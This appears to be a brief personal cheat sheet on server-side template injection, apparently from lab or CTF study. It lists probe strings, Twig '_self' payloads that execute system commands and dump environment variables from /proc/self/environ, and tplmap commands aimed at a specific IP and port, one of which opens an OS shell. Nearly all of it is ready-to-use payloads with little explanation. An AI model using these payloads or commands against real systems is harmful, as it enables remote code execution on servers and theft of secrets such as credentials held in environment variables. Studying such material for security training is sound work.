Server Side Template Injection (SSTI)

SSTI Identification

{7*7}
${7*7}
#{7*7}
%{7*7}
{{7*7}}

TWIG SSTI

Twig has a variable _self, which, in simple terms, makes a few of the internal APIs public. This _self object has been documented, so we don't need to brute force any variable names,

we can use the getFilter function as it allows execution of a user-defined function via the following process:

• Register a function as a filter callback via registerUndefinedFilterCallback

• Invoke _self.env.getFilter() to execute the function we have just registered

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}

to get the environment variables we can use

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("echo -e `cat /proc/self/environ`")}}

Automating SSTI using tqlmap

we can use TQLMAP from the below link

GitHub - epinna/tplmap: Server-Side Template Injection and Code Injection Detection and Exploitation ToolGitHub

python tplmap.py -u 'http://83.136.251.226:56235/jointheteam' -d email=test --proxy=http://127.0.0.1:8080

OS-Shell Using TPLMAP

python tplmap.py -u 'http://83.136.251.226:56235/jointheteam' -d email=test --proxy=http://127.0.0.1:8080 --os-shell